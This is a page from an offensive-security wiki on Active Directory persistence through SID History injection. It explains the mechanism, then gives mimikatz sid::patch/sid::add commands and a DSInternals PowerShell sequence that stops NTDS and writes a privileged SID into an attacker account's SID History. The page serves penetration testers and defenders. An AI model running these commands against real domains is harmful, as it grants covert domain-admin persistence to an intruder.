The Hacker Recipes
GitHubTwitterExegolTools
  • Introduction
  • Active Directory
    • Reconnaissance
      • DHCP
      • DNS
      • NBT-NS
      • Responder ⚙️
      • Port scanning
      • LDAP
      • BloodHound ⚙️
      • MS-RPC
      • enum4linux ⚙️
      • Password policy
    • Movement
      • Credentials
        • Dumping
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Group Policy Preferences
          • Network shares
          • Network protocols
          • Web browsers
          • In-memory secrets
          • Kerberos key list
          • 🛠️Cached Kerberos tickets
          • 🛠️Windows Credential Manager
          • 🛠️Local files
          • 🛠️Password managers
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
        • Impersonation
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
        • 🛠️Living off the land
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate
        • sAMAccountName spoofing
        • SPN-jacking
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Netlogon
        • ZeroLogon
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • SCCM / MECM
        • Privilege escalation
        • Post-exploitation
      • Exchange services
        • 🛠️PrivExchange
        • 🛠️ProxyLogon
        • 🛠️ProxyShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Schannel
        • Pass the Certificate
      • Built-ins & settings
        • Security groups
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • DC Shadow
      • SID History
      • Skeleton key
      • GoldenGMSA
      • AdminSDHolder
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • 🛠️DACL abuse
      • Shadow Principals (PAM)
  • Web services
    • Reconnaissance
      • HTTP response headers
      • Comments and metadata
      • Error messages
      • Site crawling
      • Directory fuzzing
      • Subdomains enumeration
      • Subdomain & vhost fuzzing
      • Web Application Firewall (WAF)
      • Content Management System (CMS)
      • Other technologies
      • Known vulnerabilities
    • Configuration
      • Default credentials
      • HTTP methods
      • HTTP security headers
        • Clickjacking
        • MIME type sniffing
        • 🛠️CORS (Cross-Origin Resource Sharing)
        • 🛠️CSP (Content Security Policy)
      • HTTP request smuggling
      • HTTP response splitting
      • Insecure Cookies
      • Denial of Service (DoS)
      • Identity and Access Management
        • 🛠️OAuth 2.0
    • Accounts and sessions
      • Security policies
      • Password change
      • 🛠️Password reset
      • Account creation
      • 🛠️Account deletion
      • 🛠️Logging in
    • User inputs
      • File inclusion
        • LFI to RCE
          • logs poisoning
          • phpinfo
          • file upload
          • PHP wrappers and streams
          • PHP session
          • /proc
        • RFI to RCE
      • Unrestricted file upload
      • SQL injection
      • XSS (Cross-Site Scripting)
      • CSRF (Cross-Site Request Forgery)
      • SSRF (Server-Side Request Forgery)
      • IDOR (Insecure Direct Object Reference)
      • ORED Open redirect
      • Content-Type juggling
      • XXE injection
      • Insecure JSON Web Tokens
      • 🛠️HTTP parameter pollution
      • 🛠️SSTI (Server-Side Template Injection)
      • 🛠️Insecure deserialization
      • 🛠️CRLF injection
      • 🛠️Arbitrary file download
      • 🛠️Directory traversal
      • 🛠️Null-byte injection
  • Systems & services
    • Reconnaissance
      • 🛠️Hosts discovery
      • Port scanning
    • Initial access (protocols)
      • 🛠️FTP
      • 🛠️SSH
      • 🛠️Telnet
      • 🛠️DNS
      • 🛠️HTTP
      • 🛠️Kerberos
      • 🛠️LDAP
      • 🛠️SMB
      • 🛠️RTSP
      • 🛠️MSSQL
      • 🛠️NFS
      • 🛠️MySQL
      • 🛠️RDP
      • 🛠️WinRM
    • Initial access (phishing)
    • Privilege escalation
      • Windows
        • 🛠️Credential dumping
        • 🛠️Unquoted path
        • 🛠️Scheduled tasks
        • 🛠️Weak service permissions
        • 🛠️Vulnerable drivers
        • 🛠️Account privileges
        • 🛠️Kernel exploitation
        • 🛠️Windows Subsystem for Linux
        • 🛠️Runas saved creds
        • Unattend files
        • 🛠️Network secrets
        • 🛠️Living off the land
      • UNIX-like
        • SUDO
        • SUID/SGID binaries
        • 🛠️Capabilities
        • 🛠️Network secrets
        • 🛠️Living off the land
    • Pivoting
      • 🛠️Port forwarding
      • 🛠️SOCKS proxy
  • Evasion
    • (AV) Anti-Virus
      • 🛠️Loader
      • 🛠️Dropper
      • 🛠️Obfuscation
      • 🛠️Process injection
      • 🛠️Stealth with C2
    • 🛠️(EDR) Endpoint Detection and Response
  • 🛠️Physical
    • Locks
    • Networking
      • Network Access Control
    • Machines
      • HID injection
      • Keylogging
      • BIOS security
      • Encryption
      • Airstrike attack
    • Super secret zones
      • 🍌Banana & chocolate cake
      • 🍳Omelette du fromage
      • 🍔Burger du seigneur
      • 🥞The Pancakes of Heaven
  • 🛠️Intelligence gathering
    • CYBINT
      • Emails
      • Web infrastructure
    • OSINT
    • GEOINT
  • 🛠️RADIO
    • RFID
      • Mifare Classic
        • Default keys
        • Darkside
        • Nested
    • Bluetooth
    • Wi-Fi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Wireless keyboard/mouse
  • 🛠️mobile apps
    • Android
      • Android Debug Bridge ⚙️
      • APK transform
      • Magisk
    • iOS
      • Certificate pinning
Powered by GitBook
On this page
  • Theory
  • Practice
  • Pre-Windows 2016
  • Post-Windows 2016
  • Resources

Was this helpful?

  1. Active Directory
  2. Persistence

SID History

PreviousDC ShadowNextSkeleton key

Last updated 1 year ago

Was this helpful?

Theory

The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user, group, computer). It is used to identify the principal within the domain and is used to control access to resources.

The SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.

This mechanism can also be abused as a means of persistence: adding the SID of a privileged account or group to the SID-History attribute of a controlled account grants rights associated with account/group of which the SID is added.

For instance, the SID of an account with Domain Admin rights can be added to a normal user SID History to grant them Domain Admin rights (the rights would not be granted per say, but the modified account would be treated as domain admin when checking rights).

Practice

There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some operations on specific Windows processes' memory.

Pre-Windows 2016

Modifying the SID History attribute of an object can be done using mimikatz, with the , and commands.

Mimikatz cannot be used on 2016+ domain controllers for that purpose, due to an error with ()

Mimikatz must be launched with at least enough privileges to perform the command (i.e. domain admin or SYSTEM).

# Generic command
mikikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:UserRecievingTheSID /new:SIDOfTheTargetedUserOrGroup"

# Example 1 : Use this command to inject the SID of built-in administrator account to the SID-History attribute of AttackerUser
mikikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:AttackerUser /new:Builtin\administrators "

# Example 2 : Use sid::lookup to retrieve the SID of an account and inject it to the SID-History attribute of AttackerUser
mikikatz.exe "sid::lookup /name:InterestingUser"
mikikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:AttackerUser /new:SIDOfInterestingUser"

Post-Windows 2016

The NTDS service must be stopped at some point and restarted for this procedure to work, which can cause various issues. Proceed with care, avoid production systems.

# Install DSInternals on the domain controller
Install-Module -Name DSInternals

# Find the account SID you want to inject
Get-ADUser -Identity $InterestingUser

# Stop the NTDS service
Stop-service NTDS -force

# Inject the SID into the SID History attribute
Add-ADDBSidHistory -samaccountname AttackerUser -sidhistory $SIDOfInterestingUser -DBPath C:\Windows\ntds\ntds.dit

# Start the NTDS service
Start-service NTDS

Resources

The only known way to add a SID to the SID History attribute of an account on a Windows domain controller 2016 and above is to use the Powershell module . This method also works for Pre-Windows 2016 domain controllers.

sid::patch
sid::add
sid::lookup
sid::patch
https://github.com/gentilkiwi/mimikatz/issues/348
privilege::debug
DSInternals
Sneaky Active Directory Persistence #14: SID HistoryActive Directory Security
SID-History attribute - Win32 appsdocsmsft
Access Token Manipulation: SID-History Injection, Sub-technique T1134.005 - Enterprise | MITRE ATT&CK®
Modify the sidHistory attribute
Using DsAddSidHistory - Win32 appsdocsmsft
DsAddSidHistoryA function (ntdsapi.h) - Win32 appsdocsmsft
A SIDHistory Attack - Marching onto a DCSecframe
Logo
Logo
Logo
Logo
Logo
Logo